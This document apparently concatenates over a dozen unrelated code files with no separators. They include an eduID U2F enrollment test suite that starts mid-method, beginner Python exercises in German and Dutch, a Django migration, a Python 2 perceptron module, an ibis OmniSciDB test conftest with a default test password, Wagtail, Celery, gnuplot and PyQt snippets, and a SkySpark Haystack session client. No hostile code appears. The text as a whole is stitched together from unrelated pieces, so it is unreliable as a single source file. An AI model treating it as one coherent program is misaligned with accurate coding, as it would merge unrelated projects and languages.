            keyhandle='keyHandle',
            app_id='appId',
            public_key='publicKey',
            attest_cert='cert',
            description='description',
            created_by='eduid_security',
        )
        user.credentials.add(u2f_token)
        self.app.central_userdb.save(user)
        return u2f_token

    def test_enroll_first_key(self):
        """Enrolling with no existing tokens yields an empty registeredKeys list."""
        # Unauthenticated request is bounced to the token service.
        response = self.browser.get('/u2f/enroll')
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        eppn = self.test_user_data['eduPersonPrincipalName']
        with self.session_cookie(self.browser, eppn) as client:
            response2 = client.get('/u2f/enroll')

            # The enroll state is mirrored into the server-side session.
            with client.session_transaction() as sess:
                self.assertIsNotNone(sess['_u2f_enroll_'])
                u2f_enroll = json.loads(sess['_u2f_enroll_'])
                self.assertEqual(u2f_enroll['appId'], 'https://eduid.se/u2f-app-id.json')
                self.assertEqual(u2f_enroll['registeredKeys'], [])
                self.assertIn('challenge', u2f_enroll['registerRequests'][0])
                self.assertIn('version', u2f_enroll['registerRequests'][0])

            enroll_data = json.loads(response2.data)
            self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_ENROLL_SUCCESS')
            self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json')
            self.assertEqual(enroll_data['payload']['registeredKeys'], [])
            self.assertIn('challenge', enroll_data['payload']['registerRequests'][0])
            self.assertIn('version', enroll_data['payload']['registerRequests'][0])

    def test_enroll_another_key(self):
        """Enrolling with one token present lists it in registeredKeys."""
        response = self.browser.get('/u2f/enroll')
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        eppn = self.test_user_data['eduPersonPrincipalName']
        _ = self.add_token_to_user(eppn)

        with self.session_cookie(self.browser, eppn) as client:
            response2 = client.get('/u2f/enroll')

            with client.session_transaction() as sess:
                self.assertIsNotNone(sess['_u2f_enroll_'])
                u2f_enroll = json.loads(sess['_u2f_enroll_'])
                self.assertEqual(u2f_enroll['appId'], 'https://eduid.se/u2f-app-id.json')
                self.assertEqual(
                    u2f_enroll['registeredKeys'],
                    [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}],
                )
                self.assertIn('challenge', u2f_enroll['registerRequests'][0])
                self.assertIn('version', u2f_enroll['registerRequests'][0])

            enroll_data = json.loads(response2.data)
            self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_ENROLL_SUCCESS')
            self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json')
            self.assertEqual(
                enroll_data['payload']['registeredKeys'],
                [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}],
            )
            self.assertIn('challenge', enroll_data['payload']['registerRequests'][0])
            self.assertIn('version', enroll_data['payload']['registerRequests'][0])

    # All network/crypto boundaries are mocked so the bind flow runs offline.
    @patch('cryptography.x509.load_der_x509_certificate')
    @patch('OpenSSL.crypto.dump_certificate')
    @patch('u2flib_server.model.U2fRegisterRequest.complete')
    @patch('eduid_common.api.am.AmRelay.request_user_sync')
    def test_bind_key(self, mock_request_user_sync, mock_u2f_register_complete, mock_dump_cert, mock_load_cert):
        """Completing enrollment (bind) stores a new credential on the user."""
        mock_dump_cert.return_value = b'der_cert'
        mock_load_cert.return_value = b'pem_cert'
        mock_request_user_sync.side_effect = self.request_user_sync
        mock_u2f_register_complete.return_value = (
            DeviceRegistration(
                version='mock version',
                keyHandle='mock keyhandle',
                appId='mock app id',
                publicKey='mock public key',
                transports='mock transport',
            ),
            'mock certificate',
        )

        response = self.browser.post('/u2f/bind', data={})
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        eppn = self.test_user_data['eduPersonPrincipalName']
        with self.session_cookie(self.browser, eppn) as client:
            # An enroll must precede bind: it seeds the session state and
            # supplies the CSRF token echoed back in the POST below.
            enroll_response = client.get('/u2f/enroll')
            csrf_token = json.loads(enroll_response.data)['payload']['csrf_token']
            data = {
                'csrf_token': csrf_token,
                'registrationData': 'mock registration data',
                'clientData': 'mock client data',
                'version': 'U2F_V2',
            }
            response2 = client.post('/u2f/bind', data=json.dumps(data), content_type=self.content_type_json)
            bind_data = json.loads(response2.data)
            self.assertEqual('POST_U2F_U2F_BIND_SUCCESS', bind_data['type'])
            self.assertNotEqual([], bind_data['payload']['credentials'])

    def test_sign(self):
        """A sign request lists the registered key and issues a challenge."""
        eppn = self.test_user_data['eduPersonPrincipalName']
        _ = self.add_token_to_user(eppn)

        response = self.browser.get('/u2f/sign')
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        with self.session_cookie(self.browser, eppn) as client:
            response2 = client.get('/u2f/sign')

            with client.session_transaction() as sess:
                self.assertIsNotNone(sess['_u2f_challenge_'])
                u2f_challenge = json.loads(sess['_u2f_challenge_'])
                self.assertEqual(u2f_challenge['appId'], 'https://eduid.se/u2f-app-id.json')
                self.assertEqual(
                    u2f_challenge['registeredKeys'],
                    [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}],
                )
                self.assertIn('challenge', u2f_challenge)

            enroll_data = json.loads(response2.data)
            self.assertEqual(enroll_data['type'], 'GET_U2F_U2F_SIGN_SUCCESS')
            self.assertEqual(enroll_data['payload']['appId'], 'https://eduid.se/u2f-app-id.json')
            self.assertEqual(
                enroll_data['payload']['registeredKeys'],
                [{u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'}],
            )
            self.assertIn('challenge', enroll_data['payload'])

    @patch('u2flib_server.model.U2fSignRequest.complete')
    def test_verify(self, mock_u2f_sign_complete):
        """Verifying a signature returns key handle, counter and touch flag."""
        eppn = self.test_user_data['eduPersonPrincipalName']
        _ = self.add_token_to_user(eppn)

        device = RegisteredKey({u'keyHandle': u'keyHandle', u'version': u'version', u'appId': u'appId'})
        mock_u2f_sign_complete.return_value = device, 1, 0  # device, signature counter, user presence (touch)

        response = self.browser.post('/u2f/bind', data={})
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        with self.session_cookie(self.browser, eppn) as client:
            # A sign request first: seeds the challenge and the CSRF token.
            sign_response = client.get('/u2f/sign')
            csrf_token = json.loads(sign_response.data)['payload']['csrf_token']
            data = {
                'csrf_token': csrf_token,
                'signatureData': 'mock registration data',
                'clientData': 'mock client data',
                'keyHandle': 'keyHandle',
            }
            response2 = client.post('/u2f/verify', data=json.dumps(data), content_type=self.content_type_json)
            verify_data = json.loads(response2.data)
            self.assertEqual(verify_data['type'], 'POST_U2F_U2F_VERIFY_SUCCESS')
            self.assertIsNotNone(verify_data['payload']['keyHandle'])
            self.assertIsNotNone(verify_data['payload']['counter'])
            self.assertIsNotNone(verify_data['payload']['touch'])

    @patch('eduid_common.api.am.AmRelay.request_user_sync')
    def test_modify(self, mock_request_user_sync):
        """Modifying a credential updates its description."""
        mock_request_user_sync.side_effect = self.request_user_sync

        eppn = self.test_user_data['eduPersonPrincipalName']
        user_token = self.add_token_to_user(eppn)

        response = self.browser.post('/u2f/modify', data={})
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        with self.session_cookie(self.browser, eppn) as client:
            credentials_response = client.get('/credentials')
            csrf_token = json.loads(credentials_response.data)['payload']['csrf_token']
            data = {
                'csrf_token': csrf_token,
                'credential_key': user_token.key,
                'description': 'test description',
            }
            response2 = client.post('/u2f/modify', data=json.dumps(data), content_type=self.content_type_json)
            modify_data = json.loads(response2.data)
            self.assertEqual(modify_data['type'], 'POST_U2F_U2F_MODIFY_SUCCESS')
            self.assertIsNotNone(modify_data['payload']['credentials'])
            for credential in modify_data['payload']['credentials']:
                self.assertIsNotNone(credential)
                if credential['key'] == 'keyHandle':
                    self.assertEqual(credential['description'], 'test description')

    @patch('eduid_common.api.am.AmRelay.request_user_sync')
    def test_remove(self, mock_request_user_sync):
        """Removing a credential deletes it from the credential list."""
        mock_request_user_sync.side_effect = self.request_user_sync

        eppn = self.test_user_data['eduPersonPrincipalName']
        user_token = self.add_token_to_user(eppn)

        response = self.browser.post('/u2f/remove', data={})
        self.assertEqual(response.status_code, 302)  # Redirect to token service

        with self.session_cookie(self.browser, eppn) as client:
            credentials_response = client.get('/credentials')
            csrf_token = json.loads(credentials_response.data)['payload']['csrf_token']
            data = {
                'csrf_token': csrf_token,
                'credential_key': user_token.key,
            }
            response2 = client.post('/u2f/remove', data=json.dumps(data), content_type=self.content_type_json)
            modify_data = json.loads(response2.data)
            self.assertEqual(modify_data['type'], 'POST_U2F_U2F_REMOVE_SUCCESS')
            self.assertIsNotNone(modify_data['payload']['credentials'])
            for credential in modify_data['payload']['credentials']:
                self.assertIsNotNone(credential)
                if credential['key'] == user_token.key:
                    raise AssertionError('credential with keyhandle keyHandle should be missing')
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep  7 15:58:26 2020

@author: fred

Small string-slicing and string-method demo: prints three derived strings.
"""

# Slice chars 2..4 of the greeting and shout them.
greeting = "Guten Morgen"
a = greeting[2:5].upper()
print(a)

# Slice chars 1..3 and turn them into a capitalized word.
racetrack = "RaceTrack"
b = racetrack[1:4].capitalize()
print(b)

# Substring substitution followed by capitalization.
summer = "summer"
c = summer.replace("umm", "inn").capitalize()
print(c)
# Mariska de Vries
# 223751


def bereken_toegangsprijs(leeftijd):
    """Return the ticket price for one visitor of the given age.

    Price bands (unchanged from the original if/elif chains):
    under 4 -> 0, 4-11 -> 10, 12-64 -> 20, 65 and over -> 10.
    """
    if leeftijd < 4:
        return 0
    elif leeftijd < 12:
        return 10
    elif leeftijd < 65:
        return 20
    return 10  # 65+


if __name__ == "__main__":
    # NOTE(review): the original also asked for this price and then ignored it
    # (the variable was immediately overwritten by the age-based price) —
    # kept the prompt for identical interaction, confirm whether it is needed.
    toegangsprijs = int(input("Wat is de prijs van het toegangskaartje: "))

    # One price calculation per visitor instead of four copy-pasted if-chains.
    totaal = 0
    for _ in range(4):
        leeftijd = int(input("Wat is uw leeftijd: "))
        totaal += bereken_toegangsprijs(leeftijd)

    print("Intotaal te betalen: " + str(totaal))
# Generated by Django 2.2 on 2019-05-22 22:14
# Auto-generated initial migration for the api app: Category, Sections,
# Product and Basket models. Do not hand-edit the operations; create a new
# migration for schema changes.

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        # Depends on the (possibly swapped) user model being available.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'Category',
                'verbose_name_plural': 'Categories',
            },
        ),
        migrations.CreateModel(
            name='Sections',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('category', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='section_c', to='api.Category')),
            ],
            options={
                'verbose_name': 'Section',
                'verbose_name_plural': 'Sections',
            },
        ),
        migrations.CreateModel(
            name='Product',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('price', models.FloatField()),
                ('description', models.CharField(max_length=200)),
                ('status', models.CharField(max_length=50)),
                ('created_by', models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='products_created', to=settings.AUTH_USER_MODEL)),
                # SET_NULL keeps sold products around if the buyer account is deleted.
                ('purchased_by', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='products_purchased', to=settings.AUTH_USER_MODEL)),
                ('sections', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='product', to='api.Sections')),
            ],
        ),
        migrations.CreateModel(
            name='Basket',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('count', models.IntegerField()),
                ('product', models.ManyToManyField(to='api.Product')),
            ],
        ),
    ]
def age_assignment(*args, **kwargs):
    """Map each name in *args* to an age from *kwargs*.

    Each keyword argument is keyed by the first letter of a name, e.g.
    ``age_assignment("Amy", A=22)`` -> ``{"Amy": 22}``. Names with no
    matching keyword get ``""`` (same placeholder as the original).

    Bug fixed: the original iterated kwargs *after* the names loop had
    finished, so ``name`` was always the last positional argument and only
    that one name ever received an age.
    """
    ages = {}
    for name in args:
        # Look the age up by the name's first letter; default to "".
        ages[name] = kwargs.get(name[0], "")
    return ages


if __name__ == "__main__":
    print(age_assignment("Amy", "Bill", "Willy", W=36, A=22, B=61))
# NOTE(review): this module is Python 2 (`print x`, `xrange`) — it will not
# run under Python 3 without porting.
from mnist import *
from spect import *
import numpy as np

# Perceptron Settings
GLOBAL_EPOCH = 1
RATE = 1

# Kernel Settings
DEGREE = 1


def linear(x, z):
    # Linear kernel: plain dot product.
    return x.dot(z)


def poly_kernel(x, z, d=DEGREE):
    # Polynomial kernel of degree d (defaults to module-level DEGREE).
    return x.dot(z)**d

# Kernel used by the classifiers; presumably consumed elsewhere — confirm.
KERNEL = poly_kernel


# Helper Functions ===
def sign(x):
    # Sign with sign(0) == 1 (never returns 0).
    if x < 0:
        return -1
    else:
        return 1

# Elementwise sign over numpy arrays.
vsign = np.vectorize(sign)


class Obj():
    # Tiny container pairing a data matrix with its target vector.
    def __init__(self, x, y):
        self.target = y
        self.data = x


def load_data(n, dataset='training'):
    # Load a dataset selected by name; falls through to a hard-coded
    # 4-sample NAND-like toy set (with bias column) for any other value.
    # if n == 1:
    #     x, y = load_mnist(dataset=dataset, path="data/")
    if n == "SPECT":
        x, y = load_spect(dataset=dataset)
    elif n == "WINEQUALITY":
        # Last CSV column is the label; the rest are features.
        x = np.loadtxt('datasets/winequality-red.csv', delimiter=";")
        y = x[:,-1]
        x = x[:,:-1]
    elif n == "WINE":
        # NOTE(review): identical to the "WINEQUALITY" branch — possibly an
        # alias kept for callers, or a leftover duplicate; confirm.
        x = np.loadtxt('datasets/winequality-red.csv', delimiter=";")
        y = x[:,-1]
        x = x[:,:-1]
    else:
        x = np.array([[1,0,0],[1,0,1],[1,1,0],[1,1,1]])
        y = np.array([[1], [1], [1], [-1]])
        print x
        print y
    return Obj(x, y)

# x_train = np.array([[1,0,0],[1,0,1],[1,1,0],[1,1,1]])
# y_train = np.array([1,1,1,-1])
# x_test = x_train
# y_test = y_train


def countErrors(g, y):
    # Number of positions where prediction g disagrees with label y.
    t = np.equal(g, y)
    return sum([1 for i in t if not i])


class MultiClassifier():
    # One-vs-rest wrapper: trains one binary classifier per distinct class
    # and predicts the class whose classifier scores highest.
    def __init__(self, clf, epoch):
        # clf is a zero-argument factory producing a binary classifier with
        # fit(X, labels, epoch) and value_predict(X) — confirm interface.
        self.classifiers = []
        self.classes = []
        self.clf = clf
        self.epoch = epoch

    def fit(self, X, Y):
        classifiers = []
        classes = np.unique(Y)
        for val in classes:
            # print "Building labels", val
            # Relabel: +1 for the current class, -1 for everything else.
            new_labels = []
            for i in xrange(len(Y)):
                if Y[i] == val:
                    new_labels.append(1)
                else:
                    new_labels.append(-1)
            clf = self.clf()
            # print "Training", val
            clf.fit(X, np.array(new_labels), self.epoch)
            classifiers.append(clf)
        self.classes = classes
        self.classifiers = classifiers

    def predict(self, X):
        # Collect raw scores from every per-class classifier, then take the
        # argmax over classes for each sample.
        guesses = []
        for clf in self.classifiers:
            guesses.append(clf.value_predict(X))
        predictions = []
        for i in xrange(len(X)):
            m_val = None
            for j in xrange(len(self.classes)): #classes
                if m_val == None or guesses[j][i] > m_val:
                    m_val = guesses[j][i]
                    m_class_index = j
            predictions.append(self.classes[m_class_index])
        return np.array(predictions)
# from .off_policy_algorithm import OffPolicyAlgorithm from .softq_controller import SoftQMPC # from .sac_mpc import SACMPC __all__ = ["SoftQMPC"] #, "SACMPC"]
"""OmniSciDB test configuration module.""" import os import typing import pandas import pytest import ibis import ibis.util as util OMNISCIDB_HOST = os.environ.get('IBIS_TEST_OMNISCIDB_HOST', 'localhost') OMNISCIDB_PORT = int(os.environ.get('IBIS_TEST_OMNISCIDB_PORT', 6274)) OMNISCIDB_USER = os.environ.get('IBIS_TEST_OMNISCIDB_USER', 'admin') OMNISCIDB_PASS = os.environ.get( 'IBIS_TEST_OMNISCIDB_PASSWORD', 'HyperInteractive' ) OMNISCIDB_PROTOCOL = os.environ.get('IBIS_TEST_OMNISCIDB_PROTOCOL', 'binary') OMNISCIDB_DB = os.environ.get('IBIS_TEST_DATA_DB', 'ibis_testing') @pytest.fixture(scope='module') def con(): """Define a connection fixture. Returns ------- ibis.omniscidb.OmniSciDBClient """ return ibis.omniscidb.connect( protocol=OMNISCIDB_PROTOCOL, host=OMNISCIDB_HOST, port=OMNISCIDB_PORT, user=OMNISCIDB_USER, password=OMNISCIDB_PASS, database=OMNISCIDB_DB, ) @pytest.fixture(scope='function') def test_table(con): """ Define fixture for test table. Yields ------- ibis.expr.types.TableExpr """ table_name = _random_identifier('table') con.drop_table(table_name, force=True) schema = ibis.schema( [('a', 'polygon'), ('b', 'point'), ('c', 'int8'), ('d', 'double')] ) con.create_table(table_name, schema=schema) yield con.table(table_name) con.drop_table(table_name) @pytest.fixture(scope='module') def session_con(): """Define a session connection fixture.""" # TODO: fix return issue return ibis.omniscidb.connect( protocol=OMNISCIDB_PROTOCOL, host=OMNISCIDB_HOST, port=OMNISCIDB_PORT, user=OMNISCIDB_USER, password=OMNISCIDB_PASS, database=OMNISCIDB_DB, ) return session_con @pytest.fixture(scope='module') def alltypes(con) -> ibis.expr.types.TableExpr: """Define a functional_alltypes table fixture. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('functional_alltypes') @pytest.fixture(scope='module') def awards_players(con) -> ibis.expr.types.TableExpr: """Define a awards_players table fixture. 
Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('awards_players') @pytest.fixture(scope='module') def batting(con) -> ibis.expr.types.TableExpr: """Define a awards_players table fixture. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Returns ------- ibis.expr.types.TableExpr """ return con.table('batting') @pytest.fixture(scope='module') def df_alltypes(alltypes: ibis.expr.types.TableExpr) -> pandas.DataFrame: """Return all the data for functional_alltypes table. Parameters ---------- alltypes : ibis.expr.types.TableExpr [description] Returns ------- pandas.DataFrame """ return alltypes.execute() @pytest.fixture def translate() -> typing.Callable: """Create a translator function. Returns ------- function """ from ..compiler import OmniSciDBDialect dialect = OmniSciDBDialect() context = dialect.make_context() return lambda expr: dialect.translator(expr, context).get_result() def _random_identifier(suffix): return '__ibis_test_{}_{}'.format(suffix, util.guid()) @pytest.fixture def temp_table(con) -> str: """Return a temporary table name. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient Yields ------ name : string Random table name for a temporary usage. """ name = _random_identifier('table') try: yield name finally: assert con.exists_table(name), name con.drop_table(name) @pytest.fixture(scope='session') def test_data_db() -> str: """Return the database name.""" return OMNISCIDB_DB @pytest.fixture def temp_database(con, test_data_db: str) -> str: """Create a temporary database. Parameters ---------- con : ibis.omniscidb.OmniSciDBClient test_data_db : str Yields ------- str """ name = _random_identifier('database') con.create_database(name) try: yield name finally: con.set_database(test_data_db) con.drop_database(name, force=True)
# Entry point for the hat-recognition GUI: builds the Qt application,
# attaches the generated UI to a main window, and runs the event loop.
from sys import argv, exit

from PyQt5.QtWidgets import QApplication, QMainWindow

from ui.hat_recognization import Ui_MainWindow

if __name__ == '__main__':
    app = QApplication(argv)
    window = QMainWindow()
    # NOTE(review): Ui_MainWindow is constructed with the window directly;
    # presumably its __init__ calls setupUi(window) — confirm in ui module.
    ui = Ui_MainWindow(window)
    window.show()
    # Block in the Qt event loop; propagate its exit code to the shell.
    exit(app.exec_())
# region import
from odo import odo
from sqlalchemy.sql.expression import bindparam

from base import *
from celery_create import celery
from enrollment import ObservationPeriod, Enrollment
# endregion


def init_pedsnet(connection):
    """Point the PEDSnet tables at the configured schema and open a session."""
    pedsnet_schema = connection.pedsnet_schema
    # override the placeholder schemas on the tables
    ObservationPeriod.__table__.schema = pedsnet_schema
    pedsnet_engine = create_pedsnet_engine(connection)
    pedsnet_session = create_pedsnet_session(pedsnet_engine)
    return pedsnet_session


def init_pcornet(connection):
    """Point the PCORnet tables at the configured schema and create its engine."""
    pcornet_schema = connection.pcornet_schema
    # override the placeholder schemas on the tables
    Enrollment.__table__.schema = pcornet_schema
    create_pcornet_engine(connection)


# NOTE(review): resolved the unresolved VCS merge-conflict markers that were
# left in this file (`<<<<<<< Updated upstream` / `=======` / `>>>>>>>
# Stashed changes`) — they made the module unimportable. Kept the stashed
# side (decorator active) since the celery import is in use; confirm that
# this function is meant to run as a celery task.
@celery.task
def enrollment_etl(config):
    """Copy PEDSnet observation periods into the PCORnet enrollment table."""
    # set up
    connection = get_connection(config)
    pedsnet_session = init_pedsnet(connection)
    init_pcornet(connection)

    # 'chart' and 'enr_basis' are constant-valued columns in the target.
    observation_period = pedsnet_session.query(ObservationPeriod.person_id,
                                               ObservationPeriod.observation_period_start_date,
                                               ObservationPeriod.observation_period_end_date,
                                               ObservationPeriod.site,
                                               bindparam("chart", 'Y'),
                                               bindparam("enr_basis", 'E')
                                               ).all()
    # endregion
    odo(observation_period, Enrollment.__table__,
        dshape='var * {patid: string, enr_start_date: date, enr_end_date: date, site: string, chart: String, '
               'enr_basis: String} '
        )

    # close session
    pedsnet_session.close()
import json

from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _

from wagtail.admin.widgets import AdminChooser
from wagtail.documents.models import get_document_model


class AdminDocumentChooser(AdminChooser):
    """Wagtail admin form widget for picking a document via the chooser modal."""

    # Labels shown by the chooser UI.
    choose_one_text = _('Choose a document')
    choose_another_text = _('Choose another document')
    link_to_chosen_text = _('Edit this document')

    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # Resolved at instantiation so custom document models are honoured.
        self.document_model = get_document_model()

    def render_html(self, name, value, attrs):
        """Render the chooser template around the base widget's HTML."""
        # Normalise value to an id and fetch the instance (if any) for display.
        instance, value = self.get_instance_and_id(self.document_model, value)
        original_field_html = super().render_html(name, value, attrs)

        return render_to_string("wagtaildocs/widgets/document_chooser.html", {
            'widget': self,
            'original_field_html': original_field_html,
            'attrs': attrs,
            'value': value,
            'document': instance,
        })

    def render_js_init(self, id_, name, value):
        """Return the JS snippet that activates the chooser for this field id."""
        # json.dumps safely quotes/escapes the element id.
        return "createDocumentChooser({0});".format(json.dumps(id_))

    class Media:
        # Scripts required by the chooser widget and its modal.
        js = [
            'wagtaildocs/js/document-chooser-modal.js',
            'wagtaildocs/js/document-chooser.js',
        ]
# Gnuplot script: plot five diametrically-opposed Zn pair distances vs time
# from the DISTANCES_270K data file (column 1 = time, columns 2-6 = pairs).
set encoding iso_8859_1
# NOTE(review): 'load' executes another gnuplot script; despite the .py
# extension this presumably contains gnuplot colour settings — confirm.
load 'Colours.py'
set autoscale
unset label
# NOTE(review): 'set linestyle' is the old pre-4.x form; newer gnuplot
# expects 'set style line' — confirm the gnuplot version in use.
set linestyle 1 lt 2 lw 1
set key box linestyle 1 lc 7
set key width 0.5 height 0.75
set key top right
set xtic auto
set ytic auto
set title "Diametrically Opposed Zn Distances at 270K" font "Times-Roman,14"
# \305 is the Angstrom sign in the iso_8859_1 encoding set above.
set ylabel "Distances (\305)"
set xlabel "Time (ps)"
set xrange [0:10]
plot "DISTANCES_270K" using 1:2 title '1rst pair' with lines, \
     "DISTANCES_270K" using 1:3 title '2nd pair' with lines, \
     "DISTANCES_270K" using 1:4 title '3rd pair' with lines, \
     "DISTANCES_270K" using 1:5 title '4th pair' with lines, \
     "DISTANCES_270K" using 1:6 title '5th pair' with lines
#plot 'file' u 1:2 with lines lt rgb "#d95319"
# Read a book count, the list of book codes (1-indexed via the leading 0
# sentinel), then answer one query per borrowed book from stdin.
num_of_books_in_total = int(input())
books_arr = [0]+list(map(int,input().split()))
no_of_borrowed_books = int(input())
for _ in range(no_of_borrowed_books):
    # Shadows the builtin `id` (harmless here, but worth renaming).
    id = int(input())
    # NOTE(review): pop() removes the element, so every later query's index
    # is shifted left by one — if queries refer to original positions this
    # is a bug and plain indexing (books_arr[id]) was probably intended;
    # confirm against the exercise statement.
    print(books_arr.pop(id))
#!/usr/bin/env python
"""
chtml.py: Replacing img urls for html file.

__author__ = "chaung.li"
"""
from re import compile
from shutil import copyfile
from json import load


def backup(filename):
    """Copy *filename* to '<filename>.bak' as a safety net before editing."""
    file_name = filename + '.bak'
    copyfile(filename, file_name)
    print(f'{file_name} Backup done!')


def dic():
    """Return the image-name -> replacement-url mapping from images.json."""
    with open('images.json', 'r') as load_f:
        return load(load_f)


def get_html():
    """Return the contents of index.html as a string."""
    # Opened read-only: the original used 'r+' but never wrote to the file.
    with open('index.html', 'r', encoding='utf-8') as f:
        return f.read()


def replace():
    """Rewrite every mapped img url in index.html into index_ok.html."""
    html = get_html()
    j_dic = dic()
    replaced = 0
    for (k, v) in j_dic.items():
        regex = compile('<img src=\"(.*{})'.format(k))
        match = regex.search(html)
        if match is None:
            # Robustness fix: the original crashed with AttributeError on
            # .group(1) when an image name was missing from the HTML.
            print(f'{k} not found, skipped')
            continue
        html = html.replace(match.group(1), v)
        replaced += 1
    with open('index_ok.html', 'w', encoding='utf-8') as f:
        f.write(html)
    # Report the number actually replaced (the original reported len(j_dic)
    # even when some entries were never found).
    print(f'{replaced} images have been replaced done')


if __name__ == '__main__':
    backup('index.html')
    replace()
#!python
# -*- coding: utf-8 -*-
"""
Skyspark Client support
"""
import hszinc
from six import string_types

from .session import HaystackSession
from .ops.vendor.skyspark import SkysparkAuthenticateOperation
from .ops.vendor.skyspark_scram import SkysparkScramAuthenticateOperation
from .mixins.vendor.skyspark import evalexpr


class SkysparkHaystackSession(HaystackSession, evalexpr.EvalOpsMixin):
    """
    The SkysparkHaystackSession class implements some base support for
    Skyspark servers.
    """

    _AUTH_OPERATION = SkysparkAuthenticateOperation

    def __init__(self, uri, username, password, project="", **kwargs):
        """
        Initialise a Skyspark Project Haystack session handler.

        :param uri: Base URI for the Haystack installation.
        :param username: Authentication user name.
        :param password: Authentication password.
        :param project: Skyspark project name
        """
        super(SkysparkHaystackSession, self).__init__(
            uri, "api/%s" % project, **kwargs
        )
        self._project = project
        self._username = username
        self._password = password
        self._authenticated = False

    @property
    def is_logged_in(self):
        """
        Return true if the user is logged in.
        """
        return self._authenticated

    # Private methods/properties

    def _on_authenticate_done(self, operation, **kwargs):
        """
        Process the result of an authentication operation.

        This needs to be implemented in the subclass and should, at minimum,
        set a flag in the subclass to indicate the authentication state and
        clear the _auth_op attribute on the base class.
        """
        try:
            cookies = operation.result
            self._authenticated = True
            self._client.cookies = cookies
        # Fixed: was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit.
        except Exception:
            self._authenticated = False
            self._client.cookies = None
        finally:
            self._auth_op = None


class SkysparkScramHaystackSession(HaystackSession, evalexpr.EvalOpsMixin):
    """
    The SkysparkHaystackSession class implements some base support for
    Skyspark servers.
    """

    _AUTH_OPERATION = SkysparkScramAuthenticateOperation

    def __init__(self, uri, username, password, project, http_args=None, **kwargs):
        """
        Initialise a Skyspark Project Haystack session handler.

        :param uri: Base URI for the Haystack installation.
        :param username: Authentication user name.
        :param password: Authentication password.
        :param project: Skyspark project name
        """
        # Skyspark is allergic to requests.Session we must turn it off.
        http_args = http_args or {}
        http_args["requests_session"] = False
        super(SkysparkScramHaystackSession, self).__init__(
            uri, "api/%s" % project, http_args=http_args, **kwargs
        )
        self._username = username
        self._password = password
        self._project = project
        self._authenticated = False
        self._authToken = None
        self._attestKey = None

    @property
    def is_logged_in(self):
        """
        Return true if the user is logged in.
        """
        return self._authenticated

    # Private methods/properties

    # For _get_grid, _post_grid, wrap the superclass version with a version
    # that defaults to exclude_cookies=True.  This is because SkySpark gets
    # confused and demands an attestation key if we round-trip its cookies.

    def _get_grid(
        self,
        uri,
        callback,
        expect_format=None,
        cache=False,
        exclude_cookies=True,
        **kwargs
    ):
        return super(SkysparkScramHaystackSession, self)._get_grid(
            uri=uri,
            callback=callback,
            expect_format=expect_format,
            cache=cache,
            exclude_cookies=exclude_cookies,
            **kwargs
        )

    def _post_grid(
        self,
        uri,
        grid,
        callback,
        expect_format=None,
        cache=False,
        exclude_cookies=True,
        **kwargs
    ):
        return super(SkysparkScramHaystackSession, self)._post_grid(
            uri=uri,
            grid=grid,
            callback=callback,
            expect_format=expect_format,
            cache=cache,
            exclude_cookies=exclude_cookies,
            **kwargs
        )

    def _on_authenticate_done(self, operation, **kwargs):
        """
        Process the result of an authentication operation.

        This needs to be implemented in the subclass and should, at minimum,
        set a flag in the subclass to indicate the authentication state and
        clear the _auth_op attribute on the base class.
        """
        try:
            op_result = operation.result
            header = op_result["header"]
            self._authenticated = True
            self._client.cookies = None
            self._client.headers = header
        # Fixed: was a bare `except:`, which would also swallow
        # KeyboardInterrupt/SystemExit.
        except Exception:
            self._authenticated = False
            self._client.cookies = None
        finally:
            self._auth_op = None

    def logout(self):
        """close session when leaving context by trick given by Brian Frank
        https://www.skyfoundry.com/forum/topic/5282#c1
        but beware that this is not standard!"""
        # TODO: Rewrite this when a standard way to close sessions is
        # implemented in Skyspark.
        def callback(response):
            try:
                status_code = response.status_code
            # The bound-but-unused `as error` was dropped; only the type
            # matters here.
            except AttributeError:
                status_code = -1
            if status_code != 200:
                self._log.warning("Failed to close skyspark session")
                self._log.warning("status_code={}".format(status_code))
            else:
                self._log.info("You've been properly disconnected")

        self._get("/user/logout", callback, api=False)

